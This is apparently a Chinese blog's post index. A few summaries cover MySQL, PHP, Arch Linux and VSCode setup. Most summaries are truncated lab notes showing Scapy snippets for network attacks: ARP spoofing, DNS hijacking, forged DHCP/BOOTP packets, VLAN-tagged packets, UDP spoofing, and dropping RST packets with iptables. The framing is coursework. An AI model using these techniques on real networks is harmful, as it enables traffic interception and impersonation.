摘要:
配置Mysql sudo mysql -u root //第一次可以直接进入 alter user 'root'@'localhost' identified by '123456'; create database usr; 配置PHP 进入目录:cd /etc/php/8.2/apache2 执
阅读全文
posted @ 2025-10-15 19:30
suiseiseki
阅读(44)
推荐(0)
摘要:
配置archlinux显示中文和中文输入法.还有配置正确的时间
阅读全文
posted @ 2024-04-04 15:26
suiseiseki
阅读(18534)
推荐(1)
摘要:
下载vscode官网 选择下载版本,根据自己的需求选择,蓝色的stable版本是非常稳定的发行版本,绿色的insiders版本是测试版,可能会有一点小bug 安装完成以后第一步当然是让我们的vscode变成中文 需要安装以下插件 插件名称:Chinese (Simplified) (简体中文) La
阅读全文
posted @ 2024-03-23 20:57
suiseiseki
阅读(97)
推荐(0)
摘要:
A机 222还是17看实际情况修改 ARP victim_ip = "192.168.222.133" ghost_ip = "192.168.222.17" arp_pkt = ARP(op=2, pdst=victim_ip, psrc=ghost_ip) print(f"开始 ARP 欺骗:
阅读全文
posted @ 2026-01-14 18:40
suiseiseki
阅读(12)
推荐(0)
摘要:
#如果不需要伪装就去掉阶段二,并且将ghost_ip更改为正常kali A的IP 🟢 阶段一:启动受害者服务 (主机 B - 192.168.17.129) nc -nvlp 20003 🔵 阶段二:实施 ARP 欺骗 (主机 A - 终端 1) sudo scapy 在Scapy中: vict
阅读全文
posted @ 2026-01-14 18:26
suiseiseki
阅读(4)
推荐(0)
摘要:
# 1. 定义伪造的 MAC 地址 my_mac = "00:11:22:33:44:55" my_mac_bytes = b'\x00\x11\x22\x33\x44\x55' # 2. 构造 BOOTP 必须的 16字节 chaddr (MAC 6字节 + 填充 10字节) chaddr_pad
阅读全文
posted @ 2026-01-14 18:14
suiseiseki
阅读(8)
推荐(0)
摘要:
环境准备 主机 A (攻击者): IP 192.168.222.132 主机 B (受害者): IP 192.168.222.133 网关: IP 192.168.222.2 目标DNS: IP 192.168.222.200 按顺序一路往下打就好 题目要求劫持为什么就直接更改rdata=“192.
阅读全文
posted @ 2026-01-14 09:38
suiseiseki
阅读(6)
推荐(0)
摘要:
KALI A(192.168.222.132)攻击 KALI B(192.168.23.133)被攻击 阶段一:KALI B启动ARP欺骗 #有效期更改为下述标红内容的标绿部分:ttl。 #如果解析为正常攻击机IP就去掉ARP欺骗。 #伪造IP部分更改为攻击机IP(查找替换将所有17.17替换为23
阅读全文
posted @ 2026-01-14 09:33
suiseiseki
阅读(8)
推荐(0)
摘要:
pkt = Ether() / Dot1Q(vlan=10)/IP(dst="192.168.222.133") / ICMP() sendp(pkt,verbose=0)
阅读全文
posted @ 2026-01-14 09:19
suiseiseki
阅读(5)
推荐(0)
摘要:
Kali A sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP echo "1111" > index.html python -m SimpleHTTPServer 8000 kali B sudo iptables -A OUT
阅读全文
posted @ 2026-01-14 09:08
suiseiseki
阅读(7)
推荐(0)
摘要:
代码 # 1. 定义伪造的 MAC 地址 my_mac = "00:11:22:33:44:55" my_mac_bytes = b'\x00\x11\x22\x33\x44\x55' # 2. 构造 BOOTP 必须的 16字节 chaddr (MAC 6字节 + 填充 10字节) chaddr_
阅读全文
posted @ 2026-01-14 09:03
suiseiseki
阅读(4)
推荐(0)
摘要:
DROP掉RST包命令sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP A终 from scapy.all import * # 网络配置常量 A_IP = "192.168.17.157" B_IP = "192.168.17.1
阅读全文
posted @ 2025-12-08 20:37
suiseiseki
阅读(11)
推荐(0)
摘要:
A from scapy.all import * msg_a="Hello A" pkt = IP(dst="192.168.17.129")/UDP(sport=5000,dport=5001)/Raw(load=msg_a) send(pkt) UDP伪装 from scapy.all imp
阅读全文
posted @ 2025-12-03 10:30
suiseiseki
阅读(14)
推荐(0)